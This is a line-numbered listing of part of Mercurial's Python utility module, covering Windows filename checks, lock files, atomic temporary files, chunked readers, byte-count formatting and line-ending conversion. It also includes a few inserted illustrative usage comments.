1787 1801 >>> checkwinfilename(b"foo\\")
1788 1802 "filename ends with '\\', which is invalid on Windows"
1789 1803 >>> checkwinfilename(b"foo\\/bar")
1790 1804 "directory name ends with '\\', which is invalid on Windows"
1791 1805 '''
1792 1806 if path.endswith('\\'):
1793 1807 return _("filename ends with '\\', which is invalid on Windows")
1794 1808 if '\\/' in path:
1795 1809 return _("directory name ends with '\\', which is invalid on Windows")
1796 1810 for n in path.replace('\\', '/').split('/'):
1797 1811 if not n:
1798 1812 continue
1799 1813 for c in _filenamebytestr(n):
1800 1814 if c in _winreservedchars:
1801 1815 return _("filename contains '%s', which is reserved "
1802 1816 "on Windows") % c
1803 1817 if ord(c) <= 31:
1804 1818 return _("filename contains '%s', which is invalid "
1805 1819 "on Windows") % stringutil.escapestr(c)
1806 1820 base = n.split('.')[0]
1807 1821 if base and base.lower() in _winreservednames:
1808 1822 return _("filename contains '%s', which is reserved "
1809 1823 "on Windows") % base
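        # note: "n not in '..'" below is a terse substring test; since n is
        # known to be non-empty here, it excludes exactly '.' and '..'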
1810 1824 t = n[-1:]
1811 1825 if t in '. ' and n not in '..':
1812 1826 return _("filename ends with '%s', which is not allowed "
1813 1827 "on Windows") % t
1814 1828
1815 1829 if pycompat.iswindows:
1816 1830 checkosfilename = checkwinfilename
1817 1831 timer = time.clock
1818 1832 else:
1819 1833 checkosfilename = platform.checkosfilename
1820 1834 timer = time.time
1821 1835
1822 1836 if safehasattr(time, "perf_counter"):
1823 1837 timer = time.perf_counter
1824 1838
1825 1839 def makelock(info, pathname):
1826 1840 """Create a lock file atomically if possible
1827 1841
1828 1842 This may leave a stale lock file if symlink isn't supported and signal
1829 1843 interrupt is enabled.
1830 1844 """
1831 1845 try:
1832 1846 return os.symlink(info, pathname)
1833 1847 except OSError as why:
1834 1848 if why.errno == errno.EEXIST:
1835 1849 raise
1836 1850 except AttributeError: # no symlink in os
1837 1851 pass
1838 1852
1839 1853 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1840 1854 ld = os.open(pathname, flags)
1841 1855 os.write(ld, info)
1842 1856 os.close(ld)
1843 1857
1844 1858 def readlock(pathname):
1845 1859 try:
1846 1860 return readlink(pathname)
1847 1861 except OSError as why:
1848 1862 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1849 1863 raise
1850 1864 except AttributeError: # no symlink in os
1851 1865 pass
1852 1866 with posixfile(pathname, 'rb') as fp:
1853 1867 return fp.read()
1854 1868
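# Illustrative sketch (not part of the module): makelock()/readlock() are
# symmetric - where symlinks exist, the lock payload travels in the link
# target, elsewhere in a small regular file, and readlock() handles both:
#
#   makelock(b'hostname:12345', b'demo.lock')
#   readlock(b'demo.lock')          # -> b'hostname:12345'
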
1855 1869 def fstat(fp):
1856 1870 '''stat file object that may not have fileno method.'''
1857 1871 try:
1858 1872 return os.fstat(fp.fileno())
1859 1873 except AttributeError:
1860 1874 return os.stat(fp.name)
1861 1875
1862 1876 # File system features
1863 1877
1864 1878 def fscasesensitive(path):
1865 1879 """
1866 1880 Return true if the given path is on a case-sensitive filesystem
1867 1881
1868 1882 Requires a path (like /foo/.hg) ending with a foldable final
1869 1883 directory component.
1870 1884 """
1871 1885 s1 = os.lstat(path)
1872 1886 d, b = os.path.split(path)
1873 1887 b2 = b.upper()
1874 1888 if b == b2:
1875 1889 b2 = b.lower()
1876 1890 if b == b2:
1877 1891 return True # no evidence against case sensitivity
1878 1892 p2 = os.path.join(d, b2)
1879 1893 try:
1880 1894 s2 = os.lstat(p2)
1881 1895 if s2 == s1:
1882 1896 return False
1883 1897 return True
1884 1898 except OSError:
1885 1899 return True
1886 1900
1887 1901 try:
1888 1902 import re2
1889 1903 _re2 = None
1890 1904 except ImportError:
1891 1905 _re2 = False
1892 1906
1893 1907 class _re(object):
1894 1908 def _checkre2(self):
1895 1909 global _re2
1896 1910 try:
1897 1911 # check if match works, see issue3964
1898 1912 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1899 1913 except ImportError:
1900 1914 _re2 = False
1901 1915
1902 1916 def compile(self, pat, flags=0):
1903 1917 '''Compile a regular expression, using re2 if possible
1904 1918
1905 1919 For best performance, use only re2-compatible regexp features. The
1906 1920 only flags from the re module that are re2-compatible are
1907 1921 IGNORECASE and MULTILINE.'''
1908 1922 if _re2 is None:
1909 1923 self._checkre2()
1910 1924 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1911 1925 if flags & remod.IGNORECASE:
1912 1926 pat = '(?i)' + pat
1913 1927 if flags & remod.MULTILINE:
1914 1928 pat = '(?m)' + pat
1915 1929 try:
1916 1930 return re2.compile(pat)
1917 1931 except re2.error:
1918 1932 pass
1919 1933 return remod.compile(pat, flags)
1920 1934
1921 1935 @propertycache
1922 1936 def escape(self):
1923 1937 '''Return the version of escape corresponding to self.compile.
1924 1938
1925 1939 This is imperfect because whether re2 or re is used for a particular
1926 1940 function depends on the flags, etc, but it's the best we can do.
1927 1941 '''
1928 1942 global _re2
1929 1943 if _re2 is None:
1930 1944 self._checkre2()
1931 1945 if _re2:
1932 1946 return re2.escape
1933 1947 else:
1934 1948 return remod.escape
1935 1949
1936 1950 re = _re()
1937 1951
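# Illustrative sketch (not part of the module): the module-level `re`
# object prefers re2 when it is importable and the flags are
# re2-compatible, and silently falls back to the stdlib `re` otherwise:
#
#   pat = re.compile(br'ab+c', remod.IGNORECASE)
#   bool(pat.match(b'ABBC'))        # -> True with either engine
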
1938 1952 _fspathcache = {}
1939 1953 def fspath(name, root):
1940 1954 '''Get name in the case stored in the filesystem
1941 1955
1942 1956 The name should be relative to root, and be normcase-ed for efficiency.
1943 1957
1944 1958 Note that this function is unnecessary, and should not be
1945 1959 called, for case-sensitive filesystems (simply because it's expensive).
1946 1960
1947 1961 The root should be normcase-ed, too.
1948 1962 '''
1949 1963 def _makefspathcacheentry(dir):
1950 1964 return dict((normcase(n), n) for n in os.listdir(dir))
1951 1965
1952 1966 seps = pycompat.ossep
1953 1967 if pycompat.osaltsep:
1954 1968 seps = seps + pycompat.osaltsep
1955 1969 # Protect backslashes. This gets silly very quickly.
1956 1970 seps = seps.replace('\\', '\\\\')
1957 1971 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1958 1972 dir = os.path.normpath(root)
1959 1973 result = []
1960 1974 for part, sep in pattern.findall(name):
1961 1975 if sep:
1962 1976 result.append(sep)
1963 1977 continue
1964 1978
1965 1979 if dir not in _fspathcache:
1966 1980 _fspathcache[dir] = _makefspathcacheentry(dir)
1967 1981 contents = _fspathcache[dir]
1968 1982
1969 1983 found = contents.get(part)
1970 1984 if not found:
1971 1985 # retry "once per directory" per "dirstate.walk", which
1972 1986 # may take place for each patch of "hg qpush", for example
1973 1987 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1974 1988 found = contents.get(part)
1975 1989
1976 1990 result.append(found or part)
1977 1991 dir = os.path.join(dir, part)
1978 1992
1979 1993 return ''.join(result)
1980 1994
1981 1995 def checknlink(testfile):
1982 1996 '''check whether hardlink count reporting works properly'''
1983 1997
1984 1998 # testfile may be open, so we need a separate file for checking to
1985 1999 # work around issue2543 (or testfile may get lost on Samba shares)
1986 2000 f1, f2, fp = None, None, None
1987 2001 try:
1988 2002 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1989 2003 suffix='1~', dir=os.path.dirname(testfile))
1990 2004 os.close(fd)
1991 2005 f2 = '%s2~' % f1[:-2]
1992 2006
1993 2007 oslink(f1, f2)
1994 2008 # nlinks() may behave differently for files on Windows shares if
1995 2009 # the file is open.
1996 2010 fp = posixfile(f2)
1997 2011 return nlinks(f2) > 1
1998 2012 except OSError:
1999 2013 return False
2000 2014 finally:
2001 2015 if fp is not None:
2002 2016 fp.close()
2003 2017 for f in (f1, f2):
2004 2018 try:
2005 2019 if f is not None:
2006 2020 os.unlink(f)
2007 2021 except OSError:
2008 2022 pass
2009 2023
2010 2024 def endswithsep(path):
2011 2025 '''Check path ends with os.sep or os.altsep.'''
2012 2026 return (path.endswith(pycompat.ossep)
2013 2027 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2014 2028
2015 2029 def splitpath(path):
2016 2030 '''Split path by os.sep.
2017 2031 Note that this function does not use os.altsep because this is
2018 2032 an alternative to a simple "xxx.split(os.sep)".
2019 2033 It is recommended to use os.path.normpath() before using this
2020 2034 function if needed.'''
2021 2035 return path.split(pycompat.ossep)
2022 2036
2023 2037 def mktempcopy(name, emptyok=False, createmode=None):
2024 2038 """Create a temporary file with the same contents as name
2025 2039
2026 2040 The permission bits are copied from the original file.
2027 2041
2028 2042 If the temporary file is going to be truncated immediately, you
2029 2043 can use emptyok=True as an optimization.
2030 2044
2031 2045 Returns the name of the temporary file.
2032 2046 """
2033 2047 d, fn = os.path.split(name)
2034 2048 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2035 2049 os.close(fd)
2036 2050 # Temporary files are created with mode 0600, which is usually not
2037 2051 # what we want. If the original file already exists, just copy
2038 2052 # its mode. Otherwise, manually obey umask.
2039 2053 copymode(name, temp, createmode)
2040 2054 if emptyok:
2041 2055 return temp
2042 2056 try:
2043 2057 try:
2044 2058 ifp = posixfile(name, "rb")
2045 2059 except IOError as inst:
2046 2060 if inst.errno == errno.ENOENT:
2047 2061 return temp
2048 2062 if not getattr(inst, 'filename', None):
2049 2063 inst.filename = name
2050 2064 raise
2051 2065 ofp = posixfile(temp, "wb")
2052 2066 for chunk in filechunkiter(ifp):
2053 2067 ofp.write(chunk)
2054 2068 ifp.close()
2055 2069 ofp.close()
2056 2070 except: # re-raises
2057 2071 try:
2058 2072 os.unlink(temp)
2059 2073 except OSError:
2060 2074 pass
2061 2075 raise
2062 2076 return temp
2063 2077
2064 2078 class filestat(object):
2065 2079 """help to exactly detect change of a file
2066 2080
2067 2081 'stat' attribute is result of 'os.stat()' if specified 'path'
2068 2082 exists. Otherwise, it is None. This avoids a preparatory
2069 2083 'exists()' examination on the caller's side.
2070 2084 """
2071 2085 def __init__(self, stat):
2072 2086 self.stat = stat
2073 2087
2074 2088 @classmethod
2075 2089 def frompath(cls, path):
2076 2090 try:
2077 2091 stat = os.stat(path)
2078 2092 except OSError as err:
2079 2093 if err.errno != errno.ENOENT:
2080 2094 raise
2081 2095 stat = None
2082 2096 return cls(stat)
2083 2097
2084 2098 @classmethod
2085 2099 def fromfp(cls, fp):
2086 2100 stat = os.fstat(fp.fileno())
2087 2101 return cls(stat)
2088 2102
2089 2103 __hash__ = object.__hash__
2090 2104
2091 2105 def __eq__(self, old):
2092 2106 try:
2093 2107 # if ambiguity between stat of new and old file is
2094 2108 # avoided, comparison of size, ctime and mtime is enough
2095 2109 # to exactly detect change of a file regardless of platform
2096 2110 return (self.stat.st_size == old.stat.st_size and
2097 2111 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2098 2112 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2099 2113 except AttributeError:
2100 2114 pass
2101 2115 try:
2102 2116 return self.stat is None and old.stat is None
2103 2117 except AttributeError:
2104 2118 return False
2105 2119
2106 2120 def isambig(self, old):
2107 2121 """Examine whether new (= self) stat is ambiguous against old one
2108 2122
2109 2123 "S[N]" below means stat of a file at N-th change:
2110 2124
2111 2125 - S[n-1].ctime < S[n].ctime: can detect change of a file
2112 2126 - S[n-1].ctime == S[n].ctime
2113 2127 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2114 2128 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2115 2129 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2116 2130 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2117 2131
2118 2132 Case (*2) above means that a file was changed twice or more
2119 2133 within the same second (= S[n-1].ctime), so comparison of
2120 2134 timestamps is ambiguous.
2121 2135
2122 2136 The basic idea to avoid such ambiguity is "advance mtime by 1
2123 2137 sec, if the timestamp is ambiguous".
2124 2138
2125 2139 But advancing mtime only in case (*2) doesn't work as
2126 2140 expected, because naturally advanced S[n].mtime in case (*1)
2127 2141 might be equal to manually advanced S[n-1 or earlier].mtime.
2128 2142
2129 2143 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2130 2144 treated as ambiguous regardless of mtime, to avoid overlooking
2131 2145 changes hidden by collisions between such mtimes.
2132 2146
2133 2147 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2134 2148 S[n].mtime", even if size of a file isn't changed.
2135 2149 """
2136 2150 try:
2137 2151 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2138 2152 except AttributeError:
2139 2153 return False
2140 2154
2141 2155 def avoidambig(self, path, old):
2142 2156 """Change file stat of specified path to avoid ambiguity
2143 2157
2144 2158 'old' should be previous filestat of 'path'.
2145 2159
2146 2160 This skips avoiding ambiguity, if a process doesn't have
2147 2161 appropriate privileges for 'path'. This returns False in this
2148 2162 case.
2149 2163
2150 2164 Otherwise, this returns True, as "ambiguity is avoided".
2151 2165 """
2152 2166 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2153 2167 try:
2154 2168 os.utime(path, (advanced, advanced))
2155 2169 except OSError as inst:
2156 2170 if inst.errno == errno.EPERM:
2157 2171 # utime() on the file created by another user causes EPERM,
2158 2172 # if a process doesn't have appropriate privileges
2159 2173 return False
2160 2174 raise
2161 2175 return True
2162 2176
2163 2177 def __ne__(self, other):
2164 2178 return not self == other
2165 2179
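# Illustrative sketch (not part of the module): detecting an ambiguous
# rewrite of a lock-guarded file. If a same-sized rewrite lands within
# the same ctime second, mtime is nudged forward so that callers
# comparing (size, ctime, mtime) still observe a change:
#
#   old = filestat.frompath(path)   # path is a hypothetical file name
#   # ... file at path is rewritten with identical size ...
#   new = filestat.frompath(path)
#   if new.isambig(old):
#       new.avoidambig(path, old)   # advances mtime past the old one
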
2166 2180 class atomictempfile(object):
2167 2181 '''writable file object that atomically updates a file
2168 2182
2169 2183 All writes will go to a temporary copy of the original file. Call
2170 2184 close() when you are done writing, and atomictempfile will rename
2171 2185 the temporary copy to the original name, making the changes
2172 2186 visible. If the object is destroyed without being closed, all your
2173 2187 writes are discarded.
2174 2188
2175 2189 checkambig argument of constructor is used with filestat, and is
2176 2190 useful only if target file is guarded by any lock (e.g. repo.lock
2177 2191 or repo.wlock).
2178 2192 '''
2179 2193 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2180 2194 self.__name = name # permanent name
2181 2195 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2182 2196 createmode=createmode)
2183 2197 self._fp = posixfile(self._tempname, mode)
2184 2198 self._checkambig = checkambig
2185 2199
2186 2200 # delegated methods
2187 2201 self.read = self._fp.read
2188 2202 self.write = self._fp.write
2189 2203 self.seek = self._fp.seek
2190 2204 self.tell = self._fp.tell
2191 2205 self.fileno = self._fp.fileno
2192 2206
2193 2207 def close(self):
2194 2208 if not self._fp.closed:
2195 2209 self._fp.close()
2196 2210 filename = localpath(self.__name)
2197 2211 oldstat = self._checkambig and filestat.frompath(filename)
2198 2212 if oldstat and oldstat.stat:
2199 2213 rename(self._tempname, filename)
2200 2214 newstat = filestat.frompath(filename)
2201 2215 if newstat.isambig(oldstat):
2202 2216 # stat of changed file is ambiguous to original one
2203 2217 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2204 2218 os.utime(filename, (advanced, advanced))
2205 2219 else:
2206 2220 rename(self._tempname, filename)
2207 2221
2208 2222 def discard(self):
2209 2223 if not self._fp.closed:
2210 2224 try:
2211 2225 os.unlink(self._tempname)
2212 2226 except OSError:
2213 2227 pass
2214 2228 self._fp.close()
2215 2229
2216 2230 def __del__(self):
2217 2231 if safehasattr(self, '_fp'): # constructor actually did something
2218 2232 self.discard()
2219 2233
2220 2234 def __enter__(self):
2221 2235 return self
2222 2236
2223 2237 def __exit__(self, exctype, excvalue, traceback):
2224 2238 if exctype is not None:
2225 2239 self.discard()
2226 2240 else:
2227 2241 self.close()
2228 2242
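# Illustrative sketch (not part of the module): atomictempfile as a
# context manager. Writes go to a temporary sibling file, and the rename
# onto the real name happens only if the block exits cleanly:
#
#   with atomictempfile(b'demo.txt') as fp:
#       fp.write(b'all or nothing\n')
#   # an exception inside the block would have discarded the temp file,
#   # leaving any previous demo.txt untouched
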
2229 2243 def unlinkpath(f, ignoremissing=False, rmdir=True):
2230 2244 """unlink and remove the directory if it is empty"""
2231 2245 if ignoremissing:
2232 2246 tryunlink(f)
2233 2247 else:
2234 2248 unlink(f)
2235 2249 if rmdir:
2236 2250 # try removing directories that might now be empty
2237 2251 try:
2238 2252 removedirs(os.path.dirname(f))
2239 2253 except OSError:
2240 2254 pass
2241 2255
2242 2256 def tryunlink(f):
2243 2257 """Attempt to remove a file, ignoring ENOENT errors."""
2244 2258 try:
2245 2259 unlink(f)
2246 2260 except OSError as e:
2247 2261 if e.errno != errno.ENOENT:
2248 2262 raise
2249 2263
2250 2264 def makedirs(name, mode=None, notindexed=False):
2251 2265 """recursive directory creation with parent mode inheritance
2252 2266
2253 2267 Newly created directories are marked as "not to be indexed by
2254 2268 the content indexing service", if ``notindexed`` is specified
2255 2269 for "write" mode access.
2256 2270 """
2257 2271 try:
2258 2272 makedir(name, notindexed)
2259 2273 except OSError as err:
2260 2274 if err.errno == errno.EEXIST:
2261 2275 return
2262 2276 if err.errno != errno.ENOENT or not name:
2263 2277 raise
2264 2278 parent = os.path.dirname(os.path.abspath(name))
2265 2279 if parent == name:
2266 2280 raise
2267 2281 makedirs(parent, mode, notindexed)
2268 2282 try:
2269 2283 makedir(name, notindexed)
2270 2284 except OSError as err:
2271 2285 # Catch EEXIST to handle races
2272 2286 if err.errno == errno.EEXIST:
2273 2287 return
2274 2288 raise
2275 2289 if mode is not None:
2276 2290 os.chmod(name, mode)
2277 2291
2278 2292 def readfile(path):
2279 2293 with open(path, 'rb') as fp:
2280 2294 return fp.read()
2281 2295
2282 2296 def writefile(path, text):
2283 2297 with open(path, 'wb') as fp:
2284 2298 fp.write(text)
2285 2299
2286 2300 def appendfile(path, text):
2287 2301 with open(path, 'ab') as fp:
2288 2302 fp.write(text)
2289 2303
2290 2304 class chunkbuffer(object):
2291 2305 """Allow arbitrarily sized chunks of data to be efficiently read from
2292 2306 an iterator over chunks of arbitrary size."""
2293 2307
2294 2308 def __init__(self, in_iter):
2295 2309 """in_iter is the iterator that's iterating over the input chunks."""
2296 2310 def splitbig(chunks):
2297 2311 for chunk in chunks:
2298 2312 if len(chunk) > 2**20:
2299 2313 pos = 0
2300 2314 while pos < len(chunk):
2301 2315 end = pos + 2 ** 18
2302 2316 yield chunk[pos:end]
2303 2317 pos = end
2304 2318 else:
2305 2319 yield chunk
2306 2320 self.iter = splitbig(in_iter)
2307 2321 self._queue = collections.deque()
2308 2322 self._chunkoffset = 0
2309 2323
2310 2324 def read(self, l=None):
2311 2325 """Read L bytes of data from the iterator of chunks of data.
2312 2326 Returns less than L bytes if the iterator runs dry.
2313 2327
2314 2328 If size parameter is omitted, read everything"""
2315 2329 if l is None:
2316 2330 return ''.join(self.iter)
2317 2331
2318 2332 left = l
2319 2333 buf = []
2320 2334 queue = self._queue
2321 2335 while left > 0:
2322 2336 # refill the queue
2323 2337 if not queue:
2324 2338 target = 2**18
2325 2339 for chunk in self.iter:
2326 2340 queue.append(chunk)
2327 2341 target -= len(chunk)
2328 2342 if target <= 0:
2329 2343 break
2330 2344 if not queue:
2331 2345 break
2332 2346
2333 2347 # The easy way to do this would be to queue.popleft(), modify the
2334 2348 # chunk (if necessary), then queue.appendleft(). However, for cases
2335 2349 # where we read partial chunk content, this incurs 2 dequeue
2336 2350 # mutations and creates a new str for the remaining chunk in the
2337 2351 # queue. Our code below avoids this overhead.
2338 2352
2339 2353 chunk = queue[0]
2340 2354 chunkl = len(chunk)
2341 2355 offset = self._chunkoffset
2342 2356
2343 2357 # Use full chunk.
2344 2358 if offset == 0 and left >= chunkl:
2345 2359 left -= chunkl
2346 2360 queue.popleft()
2347 2361 buf.append(chunk)
2348 2362 # self._chunkoffset remains at 0.
2349 2363 continue
2350 2364
2351 2365 chunkremaining = chunkl - offset
2352 2366
2353 2367 # Use all of unconsumed part of chunk.
2354 2368 if left >= chunkremaining:
2355 2369 left -= chunkremaining
2356 2370 queue.popleft()
2357 2371 # offset == 0 is enabled by block above, so this won't merely
2358 2372 # copy via ``chunk[0:]``.
2359 2373 buf.append(chunk[offset:])
2360 2374 self._chunkoffset = 0
2361 2375
2362 2376 # Partial chunk needed.
2363 2377 else:
2364 2378 buf.append(chunk[offset:offset + left])
2365 2379 self._chunkoffset += left
2366 2380 left -= chunkremaining
2367 2381
2368 2382 return ''.join(buf)
2369 2383
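# Illustrative sketch (not part of the module): chunkbuffer rechunks an
# iterator of arbitrarily sized byte strings into reads of exactly the
# requested size, except when the underlying iterator runs dry:
#
#   cb = chunkbuffer(iter([b'ab', b'cdef', b'g']))
#   cb.read(3)                      # -> b'abc'
#   cb.read(100)                    # -> b'defg' (iterator exhausted)
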
2370 2384 def filechunkiter(f, size=131072, limit=None):
2371 2385 """Create a generator that produces the data in the file, size
2372 2386 (default 131072) bytes at a time, up to an optional limit (default is
2373 2387 to read all data). Chunks may be less than size bytes if the
2374 2388 chunk is the last chunk in the file, or the file is a socket or
2375 2389 some other type of file that sometimes reads less data than is
2376 2390 requested."""
2377 2391 assert size >= 0
2378 2392 assert limit is None or limit >= 0
2379 2393 while True:
2380 2394 if limit is None:
2381 2395 nbytes = size
2382 2396 else:
2383 2397 nbytes = min(limit, size)
2384 2398 s = nbytes and f.read(nbytes)
2385 2399 if not s:
2386 2400 break
2387 2401 if limit:
2388 2402 limit -= len(s)
2389 2403 yield s
2390 2404
2391 2405 class cappedreader(object):
2392 2406 """A file object proxy that allows reading up to N bytes.
2393 2407
2394 2408 Given a source file object, instances of this type allow reading up to
2395 2409 N bytes from that source file object. Attempts to read past the allowed
2396 2410 limit are treated as EOF.
2397 2411
2398 2412 It is assumed that I/O is not performed on the original file object
2399 2413 in addition to I/O that is performed by this instance. If there is,
2400 2414 state tracking will get out of sync and unexpected results will ensue.
2401 2415 """
2402 2416 def __init__(self, fh, limit):
2403 2417 """Allow reading up to <limit> bytes from <fh>."""
2404 2418 self._fh = fh
2405 2419 self._left = limit
2406 2420
2407 2421 def read(self, n=-1):
2408 2422 if not self._left:
2409 2423 return b''
2410 2424
2411 2425 if n < 0:
2412 2426 n = self._left
2413 2427
2414 2428 data = self._fh.read(min(n, self._left))
2415 2429 self._left -= len(data)
2416 2430 assert self._left >= 0
2417 2431
2418 2432 return data
2419 2433
2420 2434 def readinto(self, b):
2421 2435 res = self.read(len(b))
2422 2436 if res is None:
2423 2437 return None
2424 2438
2425 2439 b[0:len(res)] = res
2426 2440 return len(res)
2427 2441
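# Illustrative sketch (not part of the module): cappedreader exposes at
# most N bytes of the underlying file object and reports EOF afterwards:
#
#   fh = stringio(b'0123456789')
#   capped = cappedreader(fh, 4)
#   capped.read()                   # -> b'0123' (read(-1) means "the rest")
#   capped.read(1)                  # -> b'' (limit reached, looks like EOF)
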
2428 2442 def unitcountfn(*unittable):
2429 2443 '''return a function that renders a readable count of some quantity'''
2430 2444
2431 2445 def go(count):
2432 2446 for multiplier, divisor, format in unittable:
2433 2447 if abs(count) >= divisor * multiplier:
2434 2448 return format % (count / float(divisor))
2435 2449 return unittable[-1][2] % count
2436 2450
2437 2451 return go
2438 2452
2439 2453 def processlinerange(fromline, toline):
2440 2454 """Check that linerange <fromline>:<toline> makes sense and return a
2441 2455 0-based range.
2442 2456
2443 2457 >>> processlinerange(10, 20)
2444 2458 (9, 20)
2445 2459 >>> processlinerange(2, 1)
2446 2460 Traceback (most recent call last):
2447 2461 ...
2448 2462 ParseError: line range must be positive
2449 2463 >>> processlinerange(0, 5)
2450 2464 Traceback (most recent call last):
2451 2465 ...
2452 2466 ParseError: fromline must be strictly positive
2453 2467 """
2454 2468 if toline - fromline < 0:
2455 2469 raise error.ParseError(_("line range must be positive"))
2456 2470 if fromline < 1:
2457 2471 raise error.ParseError(_("fromline must be strictly positive"))
2458 2472 return fromline - 1, toline
2459 2473
2460 2474 bytecount = unitcountfn(
2461 2475 (100, 1 << 30, _('%.0f GB')),
2462 2476 (10, 1 << 30, _('%.1f GB')),
2463 2477 (1, 1 << 30, _('%.2f GB')),
2464 2478 (100, 1 << 20, _('%.0f MB')),
2465 2479 (10, 1 << 20, _('%.1f MB')),
2466 2480 (1, 1 << 20, _('%.2f MB')),
2467 2481 (100, 1 << 10, _('%.0f KB')),
2468 2482 (10, 1 << 10, _('%.1f KB')),
2469 2483 (1, 1 << 10, _('%.2f KB')),
2470 2484 (1, 1, _('%.0f bytes')),
2471 2485 )
2472 2486
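# Illustrative sketch (not part of the module): bytecount picks the first
# row of the table whose threshold the value meets, so displayed
# precision shrinks as magnitude grows:
#
#   bytecount(100)                  # -> '100 bytes'
#   bytecount(100000)               # -> '97.7 KB'
#   bytecount(1 << 20)              # -> '1.00 MB'
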
2473 2487 class transformingwriter(object):
2474 2488 """Writable file wrapper to transform data by function"""
2475 2489
2476 2490 def __init__(self, fp, encode):
2477 2491 self._fp = fp
2478 2492 self._encode = encode
2479 2493
2480 2494 def close(self):
2481 2495 self._fp.close()
2482 2496
2483 2497 def flush(self):
2484 2498 self._fp.flush()
2485 2499
2486 2500 def write(self, data):
2487 2501 return self._fp.write(self._encode(data))
2488 2502
2489 2503 # Matches a single EOL which can either be a CRLF where repeated CR
2490 2504 # are removed or a LF. We do not care about old Macintosh files, so a
2491 2505 # stray CR is an error.
2492 2506 _eolre = remod.compile(br'\r*\n')
2493 2507
2494 2508 def tolf(s):
2495 2509 return _eolre.sub('\n', s)
2496 2510
2497 2511 def tocrlf(s):
2498 2512 return _eolre.sub('\r\n', s)
2499 2513
2500 2514 def _crlfwriter(fp):
2501 2515 return transformingwriter(fp, tocrlf)
2502 2516
2503 2517 if pycompat.oslinesep == '\r\n':
2504 2518 tonativeeol = tocrlf
2505 2519 fromnativeeol = tolf
2506 2520 nativeeolwriter = _crlfwriter
2507 2521 else:
2508 2522 tonativeeol = pycompat.identity
2509 2523 fromnativeeol = pycompat.identity
2510 2524 nativeeolwriter = pycompat.identity
2511 2525
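# Illustrative sketch (not part of the module): tolf()/tocrlf() normalize
# line endings across a whole buffer, and tonativeeol/fromnativeeol
# resolve to whichever direction matches pycompat.oslinesep here:
#
#   tolf(b'a\r\nb\r\n')             # -> b'a\nb\n'
#   tocrlf(b'a\nb\n')               # -> b'a\r\nb\r\n'
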
2512 2526 if (pyplatform.python_implementation() == 'CPython' and
2513 2527 sys.version_info < (3, 0)):
2514 2528 # There is an issue in CPython that some IO methods do not handle EINTR
2515 2529 # correctly. The following table shows what CPython version (and functions)
2516 2530 # are affected (buggy: has the EINTR bug, okay: otherwise):
2517 2531 #
2518 2532 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2519 2533 # --------------------------------------------------
2520 2534 # fp.__iter__ | buggy | buggy | okay
2521 2535 # fp.read* | buggy | okay [1] | okay
2522 2536 #
2523 2537 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2524 2538 #
2525 2539 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2526 2540 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2527 2541 #
2528 2542 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2529 2543 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2530 2544 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2531 2545 # fp.__iter__ but not other fp.read* methods.
2532 2546 #
2533 2547 # On modern systems like Linux, the "read" syscall cannot be interrupted
2534 2548 # when reading "fast" files like on-disk files. So the EINTR issue only
2535 2549 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2536 2550 # files approximately as "fast" files and use the fast (unsafe) code path,
2537 2551 # to minimize the performance impact.
2538 2552 if sys.version_info >= (2, 7, 4):
2539 2553 # fp.readline deals with EINTR correctly, use it as a workaround.
2540 2554 def _safeiterfile(fp):
2541 2555 return iter(fp.readline, '')
2542 2556 else:
2543 2557 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2544 2558 # note: this may block longer than necessary because of bufsize.
2545 2559 def _safeiterfile(fp, bufsize=4096):
2546 2560 fd = fp.fileno()
2547 2561 line = ''
2548 2562 while True:
2549 2563 try:
2550 2564 buf = os.read(fd, bufsize)
2551 2565 except OSError as ex:
2552 2566 # os.read only raises EINTR before any data is read
2553 2567 if ex.errno == errno.EINTR:
2554 2568 continue
2555 2569 else:
2556 2570 raise
2557 2571 line += buf
2558 2572 if '\n' in buf:
2559 2573 splitted = line.splitlines(True)
2560 2574 line = ''
2561 2575 for l in splitted:
2562 2576 if l[-1] == '\n':
2563 2577 yield l
2564 2578 else:
2565 2579 line = l
2566 2580 if not buf:
2567 2581 break
2568 2582 if line:
2569 2583 yield line
2570 2584
2571 2585 def iterfile(fp):
2572 2586 fastpath = True
2573 2587 if type(fp) is file:
2574 2588 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2575 2589 if fastpath:
2576 2590 return fp
2577 2591 else:
2578 2592 return _safeiterfile(fp)
2579 2593 else:
2580 2594 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2581 2595 def iterfile(fp):
2582 2596 return fp
2583 2597
2584 2598 def iterlines(iterator):
2585 2599 for chunk in iterator:
2586 2600 for line in chunk.splitlines():
2587 2601 yield line
2588 2602
2589 2603 def expandpath(path):
2590 2604 return os.path.expanduser(os.path.expandvars(path))
2591 2605
